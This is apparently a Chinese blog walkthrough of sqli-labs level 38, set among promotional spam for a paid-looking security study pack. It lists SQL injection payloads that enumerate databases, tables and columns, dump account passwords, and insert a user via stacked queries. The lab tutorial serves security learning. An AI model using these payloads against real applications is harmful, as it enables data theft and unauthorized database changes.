SQLi 38关_sqli-labs 38(1)

于 2024-05-17 07:32:24 发布
阅读量719 收藏 10
点赞数 12
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264662/article/details/138989651
版权

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

使用 union 联合查询 测试字段显示的位置

?id=-1' union select 1,2,3 -- a

此处 id=-1 , 由于id不能为负数 , 所以该SQL查询不到用户数据 , 返回的结果就只有 联合查询的 1 2 3 这一条数据 , 目的在于方便展示字段显示位置

第四步,获取所有数据库

查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有的数据库名

?id=-1' union select 1,2,
(select group_concat(schema_name)
from information_schema.schemata)
 -- a

此处的 group_concat() , 可以将多行数据 合并为一行

下一步 , 根据 security 数据库 , 获取其所有表

第五步,获取所有表

查询information_schema默认数据库的tables表的table_name字段 , 该字段保存了所有的表名

?id=-1' union select 1,2,
(select group_concat(table_name)
from information_schema.tables 
where table_schema='security')
 -- a

users表为用户表 , 下一步根据users表获取其所有字段

第六步,获取所有字段

查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所以的字段名

?id=-1' union select 1,2,
(select group_concat(column_name)
from information_schema.columns 
where table_schema='security' and table_name='users')
 -- a

至此可知 , 数据库 security, 表 users, 字段 id,users,password , 下一步 ,根据此信息查询账号和密码

第七步,获取账号密码
?id=-1' union select 1,2,
(select group_concat(username,'~',password)
from users)
 -- a

第八步,叠加注入

利用该关卡的SQL的 mysqli_multi_query() , 同时执行多条SQL , 实现插入用户

?id=-1' ;
insert into users(id,username,password)
values(20,'zhangsan','123')
 -- a

访问新增的用户 id为20

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84264662
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
Qt:windows下Qt安装教程
hw5230的博客
06-02 3377
对于 MinGW-w64 项目,它对应的小型系统环境叫 MSYS2(Minimal SYStem 2),MSYS2 是 MSYS 的衍生版,不仅支持 64 位系统和 32 位系统,还有自己的独特的软件包管理工具,它从 Arch Linux 系统里移植了 pacman 软件管理工具,所以装了 MSYS2 之后,可以直接通过 pacman 来下载安装软件,而且可以自动解决依赖系、方便系统升级等。如何找到 Qt 软件的下载地址呢?只要前面两个数字相同,Qt 的特性就是一致的,最后的数字是对该版本的补丁更新。
Qt下载安装及配置教程(非常详细),从零基础入门到精通,看完这一篇就够了
热门推荐
Python_0011的博客
07-13 12万+
进入qt中文网站:https://www.qt.io/zh-cn/ 下载开源版 往下滑,下载Qt在线安装程序 它已经检测出我的是windows系统,直接点击download就好。如果是其它的系统,需要找到对应自己系统的安装包。 然后跟网速有,等一会就会自动下载 等待下载完成,双击.exe文件,就可以进行安装。 首先就是登录qt账户,如果没有可以自行注册一个。然后选择个人用户,之后点击下一步进行安装。 如果期间有报出现网络错误,请参考我本篇文章:https://blog.csdn.net/changyana
【Qt5.12】Qt5.12安装教程[通俗易懂]
hw5230的博客
06-02 7873
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/145444.html原文链接:https://javaforall.cn。Step1: 双击安装包, 稍等片刻, 然后点击next。Step2: 如果没有账号, 则选择skip。Step3: Qt设置欢迎界面, 选择下一步。Step6: 同意许可协议, 然后选择下一步。Step5: 选择组件, 然后选择下一步。Step2: 选择Qt控件项目。Step4: 选择安装路径。Step9: 选择下一步。Step4: 选择Kit。
QT的安装 [新版2022]
飞浪纪元FE的博客
10-27 4475
最近QT发布了6版本,5.x版本依然坚挺,官方也给出了LTS的标识,类似Unity,作为长期支持版的意思。 安装方式变得简单,只需要一个账号,可以在线自动安装和下载所需要的版本。
如何在本地安装部署WinSCP,并实现公网远程本地服务器
最新发布
qq_63320529的博客
11-27 751
如何在本地安装部署WinSCP,并实现公网远程本地服务器。
sqli-labs-master.zip
03-17
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
微信小程序反编译工具
03-07
1.安装node 和 Microsoft VS Code 2.观看 wxapkg\小程序反编译全套\视频教程-解包流程 教学视屏 3.是否有分包处理方式不同,经过测试,目前还没有不能反编译的小程序 4.即使小程序有N个分包也能反编译,工具包里自带典型小程序 5.获取 wxapkg 包请百度,通用的做法是:安装 夜神模拟器 -> 安装微信 -> 打开小程序 -> 打开文件管理器(自带) -> 进入目录:/data/data/com.tencent.mm/MicroMsg/uuid/appbrand/pkg/xxx.wxapkg 6.如果小程序有分包,请在小程序中点击N多菜单
面试宝典Python 391页.pdf
07-04
面试宝典Python 391页.pdf
威胁情报平台OpenCTI搭建教程
流浪法师的博客
04-01 6058
OpenCTI是一个开源平台,允许组织管理他们的网络威胁情报知识和观察结果。它的创建是为了结构化、存储、组织和可视化于网络威胁的技术和非技术信息。
Python 爬虫面试题 170 道:2019 版
qq_33570092的博客
06-10 1088
引言最近在刷面试题,所以需要看大量的 Python 相的面试题,从大量的题目中总结了很多的知识,同时也对一些题目进行拓展了,但是在看了网上的大部分面试题不是很满意,一个...
17.JAVA之三大框架Maven、Springboot、SpringMVC
weixin_56027329的博客
05-06 1580
JAVA之三大框架Maven(eclipse和idea配置)、Springboot(eclipse和idea配置)、SpringMVC
java主流框架
qq_47360019的博客
10-15 2784
java主流框架
PbootCMS V1.3.8 发布,PHP免费建站系统
cpongo5
04-12 288
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> 更新日志: 1、新增同时支持f...
python 面试宝典
muhan的博客
08-14 210
自我介绍说什么? 个人信息 你好,我叫xxx,毕业于 xxx,所学专业是xxx 掌握的技术,参与过的项目 之前就职于xxx公司,担任后端工程师,负责xxx项目,对xxx技术比较熟悉 应聘的岗位,表达对该岗位的看法和兴趣 我的工作经验和目前这个岗位较为匹配,希望能够应聘到这个岗位… STAR模型 情景 什么情况下发生 任务 你是如何明确你的任务的 行动 采取了什么样...
虚拟机安装centos7
xiao_yu_gan的博客
04-07 1万+
1、简介 这里虚拟机采用VMware15.1.0,镜像采用CentOS7版本,官网或国内镜像可直接下载。 2、安装流程 1、打开vmware软件,点击 创建新的虚拟机。 2、选择 典型,点击 下一步。 3、选择 稍后安装操作系统。 4、选择 Linux,版本选择 CentOS 7 64位。 5、填写自己的虚拟机名称,选择安装的位置。 6、指定磁盘的大小。 7、点击 自定义硬件。 8、根据实际情况设置合适的内存。 9、选择对应的ISO映像文件。 10、设置合适的网络连接模式,这里选择NAT模
sqli-labs38
08-31
sqli-labs38是一个SQL注入实验环境,用于测试和学习SQL注入漏洞。它包含了一系列不同难度级别的注入场景,旨在帮助用户了解和理解SQL注入的工作原理和防御措施。在sqli-labs38中,你可以通过构造特定的SQL语句来绕过应用程序的安全机制,访问、修改或删除数据库中的数据。通过在注入点插入恶意的SQL代码,攻击者可以执行各种恶意操作,如登录绕过、数据库盗取等。因此,在开发和部署Web应用程序时,需要采取适当的防御措施,如输入验证、参数化查询、限制数据库权限等,以防止SQL注入攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [sqli-labs(38)](https://blog.csdn.net/weixin_30522095/article/details/97563858)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [SQLi 38](https://blog.csdn.net/wangyuxiang946/article/details/118096837)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值